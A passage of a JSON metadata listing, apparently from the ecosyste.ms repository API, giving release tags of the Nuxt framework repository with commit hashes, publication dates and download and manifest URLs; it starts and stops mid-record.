.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","depende